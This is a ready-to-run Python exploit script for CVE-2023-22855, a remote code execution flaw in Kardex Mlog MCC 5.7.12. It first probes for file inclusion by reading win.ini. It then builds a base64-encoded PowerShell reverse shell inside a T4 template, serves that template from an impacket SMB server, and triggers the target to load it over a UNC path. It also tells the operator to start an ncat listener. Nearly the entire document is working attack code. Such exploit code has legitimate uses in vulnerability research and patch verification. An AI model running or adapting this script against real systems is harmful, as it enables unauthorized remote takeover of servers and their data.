Kardex Mlog MCC 5.7.12 Remote Code Execution

`#!/usr/bin/env python3  
  
# Exploit Title: Kardex Mlog MCC 5.7.12 - RCE (Remote Code Execution)  
# Date: 12/13/2022  
# Exploit Author: Patrick Hener  
# Vendor Homepage: https://www.kardex.com/en/mlog-control-center  
# Version: 5.7.12+0-a203c2a213-master  
# Tested on: Windows Server 2016  
# CVE : CVE-2023-22855  
# Writeup: https://hesec.de/posts/CVE-2023-22855  
#  
# You will need to run a netcat listener beforehand: ncat -lnvp <port>  
#  
import requests, argparse, base64, os, threading  
from impacket import smbserver  
  
def probe(target):  
headers = {  
"Accept-Encoding": "deflate"  
}  
res = requests.get(f"{target}/\\Windows\\win.ini", headers=headers)  
if "fonts" in res.text:  
return True  
else:  
return False  
  
def gen_payload(lhost, lport):  
rev_shell_blob = f'$client = New-Object System.Net.Sockets.TCPClient("{lhost}",{lport});$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{{0}};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){{;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()}};$client.Close()'  
rev_shell_blob_b64 = base64.b64encode(rev_shell_blob.encode('UTF-16LE'))  
payload = f"""<#@ template language="C#" #>  
<#@ Import Namespace="System" #>  
<#@ Import Namespace="System.Diagnostics" #>  
<#  
var proc1 = new ProcessStartInfo();  
string anyCommand;  
anyCommand = "powershell -e {rev_shell_blob_b64.decode()}";  
proc1.UseShellExecute = true;  
proc1.WorkingDirectory = @"C:\Windows\System32";  
proc1.FileName = @"C:\Windows\System32\cmd.exe";  
proc1.Verb = "runas";  
proc1.Arguments = "/c "+anyCommand;  
Process.Start(proc1);  
#>"""  
  
return payload  
  
def start_smb_server(lhost):  
server = smbserver.SimpleSMBServer(listenAddress=lhost, listenPort=445)  
server.addShare("SHARE", os.getcwd(), '')  
server.setSMB2Support(True)  
server.setSMBChallenge('')  
server.start()  
  
def trigger_vulnerability(target, lhost):  
headers = {  
"Accept-Encoding": "deflate"  
}  
  
requests.get(f"{target}/\\\\{lhost}\\SHARE\\exploit.t4", headers=headers)  
  
def main():  
# Well, args  
parser = argparse.ArgumentParser()  
parser.add_argument('-t', '--target', help='Target host url', required=True)  
parser.add_argument('-l', '--lhost', help='Attacker listening host', required=True)  
parser.add_argument('-p', '--lport', help='Attacker listening port', required=True)  
args = parser.parse_args()  
  
# Probe if target is vulnerable  
print("[*] Probing target")  
if probe(args.target):  
print("[+] Target is alive and File Inclusion working")  
else:  
print("[-] Target is not alive or File Inclusion not working")  
exit(-1)  
  
# Write payload to file  
print("[*] Writing 'exploit.t4' payload to be included later on")  
with open("exploit.t4", 'w') as template:  
template.write(gen_payload(args.lhost, args.lport))  
  
template.close()  
  
# Start smb server in background  
print("[*] Starting SMB Server in the background")  
smb_server_thread = threading.Thread(target=start_smb_server, name="SMBServer", args=(args.lhost,))  
smb_server_thread.start()  
  
# Rev Shell reminder  
print("[!] At this point you should have spawned a rev shell listener")  
print(f"[i] 'ncat -lnvp {args.lport}' or 'rlwrap ncat -lnvp {args.lport}'")  
print("[?] Are you ready to trigger the vuln? Then press enter!")  
input() # Wait for input then continue  
  
# Trigger vulnerability  
print("[*] Now triggering the vulnerability")  
trigger_vulnerability(args.target, args.lhost)  
  
# Exit  
print("[+] Enjoy your shell. Bye!")  
os._exit(1)  
  
  
  
if __name__ == "__main__":  
main()  
  
  
`